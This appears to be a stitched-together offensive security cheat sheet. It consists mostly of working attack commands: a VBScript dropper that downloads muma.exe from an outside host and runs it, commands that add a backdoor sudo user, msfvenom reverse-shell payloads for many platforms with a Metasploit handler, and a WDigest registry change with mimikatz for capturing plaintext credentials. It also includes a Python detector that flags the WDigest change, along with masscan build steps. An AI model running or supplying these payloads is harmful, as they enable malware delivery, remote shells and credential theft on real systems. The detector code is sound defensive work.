echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://www.jbzj.com/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:\zl.exe") >>zl.vbs

Persistence

Add a user, set the password non-interactively, and add the user to the sudo group
adduser python32
echo python32:password|chpasswd
gpasswd -a username sudo
Move the home directory: sudo usermod -d /path/to/new/home -m username

File download

tar -cvf log.tar log2012.log          # pack only, no compression
tar -zcvf log.tar.gz log2012.log      # pack, then compress with gzip
tar -jcvf log.tar.bz2 log2012.log     # pack, then compress with bzip2

python -m SimpleHTTPServer 8001

<?php
if (isset($_POST["AAA"])) {
    echo "ISSET";
} else {
    echo "UNSET";
}

A form has to be constructed for this:
<form enctype="application/x-www-form-urlencoded" action="http://10.16.83.113/exec.php" method="POST">
<input type="text" name="radiobutton" value="homeway">
<input type="text" name="key" value="nokey">
<input type="submit" value="submit">
</form>

Alternatively, modify the request directly in Burp, but it must carry Content-Type: application/x-www-form-urlencoded

List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see 'msfvenom --help-formats' for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – 'msfconsole -L -r '

(reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
Use the 32-bit or 64-bit program that matches the operating system.
privilege::debug
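
Setting UseLogonCredential to 1 makes WDigest keep plaintext logon credentials in LSASS memory, so the reg add line above is worth alerting on. The following is an added example, not part of the original notes: a Python check over process-creation command lines that flags this change. The event fields (host, user, cmd) and the sample events are constructed assumptions, and the extra hive spellings and PowerShell cmdlets go beyond the single command shown on the page.

```python
import re

# WDigest key under reg.exe (HKLM / HKEY_LOCAL_MACHINE) or PowerShell (HKLM:) spelling.
KEY_RE = re.compile(
    r"(?:HKLM:?|HKEY_LOCAL_MACHINE)\\SYSTEM\\CurrentControlSet\\Control"
    r"\\SecurityProviders\\WDigest", re.I)
VALUE_RE = re.compile(r"\bUseLogonCredential\b", re.I)
# reg.exe passes the data with /d, PowerShell with -Value; accept 1 or 0x1 only.
DATA_RE = re.compile(r"(?:/d|-Value)\s+[\"']?(?:0x0*1|1)[\"']?(?=\s|\)|$)", re.I)
# Only commands that write: "reg add" or Set-/New-ItemProperty.
WRITER_RE = re.compile(r"\breg(?:\.exe)?\"?\s+add\b|\b(?:Set|New)-ItemProperty\b", re.I)


def enables_wdigest_plaintext(cmd: str) -> bool:
    """True if the command line sets WDigest UseLogonCredential to 1."""
    return all(rx.search(cmd) for rx in (WRITER_RE, KEY_RE, VALUE_RE, DATA_RE))


def scan(events):
    """Return (host, user) for each process-creation event that matches."""
    return [(e["host"], e["user"]) for e in events
            if enables_wdigest_plaintext(e["cmd"])]


# Constructed sample events; the host/user/cmd field names are assumptions.
KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
LONG_KEY = KEY.replace("HKLM", "HKEY_LOCAL_MACHINE")
PS_KEY = KEY.replace("HKLM", "HKLM:")
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice",   # the reg add command from the page
     "cmd": f"reg add {KEY} /v UseLogonCredential /t REG_DWORD /d 1"},
    {"host": "ws02", "user": "bob",     # full path, long hive name, hex data
     "cmd": rf'"C:\Windows\System32\reg.exe" ADD "{LONG_KEY}" '
            "/v UseLogonCredential /t REG_DWORD /d 0x1 /f"},
    {"host": "ws03", "user": "carol",   # PowerShell equivalent
     "cmd": f"powershell -c Set-ItemProperty -Path {PS_KEY} "
            "-Name UseLogonCredential -Value 1"},
    {"host": "ws04", "user": "dave",    # read-only query: not flagged
     "cmd": f"reg query {KEY} /v UseLogonCredential"},
    {"host": "ws05", "user": "erin",    # hardening (value 0): not flagged
     "cmd": f"reg add {KEY} /v UseLogonCredential /t REG_DWORD /d 0 /f"},
]

if __name__ == "__main__":
    for host, user in scan(SAMPLE_EVENTS):
        print(f"ALERT WDigest plaintext caching enabled on {host} by {user}")
```

The ws05 command, which writes the value 0, is the corrected setting and is deliberately not flagged.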

masscan repository: https://github.com/robertdavidgraham/masscan/

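After downloading the package, change into masscan-master.
Install MinGW (short for Minimalist GNU for Windows).
Add MinGW's bin directory to PATH.
Run mingw32-make.
The build fails with an error: stdio.h cannot be found.
Open the Makefile.
Add the part shown in bold (marked with ** below) at the following position: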
DEFINES =
CFLAGS = -g -ggdb $(FLAGS2) $(INCLUDES) $(DEFINES) -Wall -O3 ** --target=i686-pc-mingw32 **
#CFLAGS = -g -ggdb -march=i686 -Ivs10/include $(DEFINES) -Wall -O3
.SUFFIXES: .c .cpp
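The next build fails because pthread.h cannot be found.
Download pthread and copy pthread.h from its include directory into the include directory under the MinGW installation.
The next build fails with unresolved symbols of the form xxx@16; append -lws2_32 -liphlpapi at the end of the link step in the Makefile.
ws2_32 is winsock32; iphlpapi provides some very useful functions for retrieving network information.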
https://msdn.microsoft.com/en-us/library/ms923804.aspx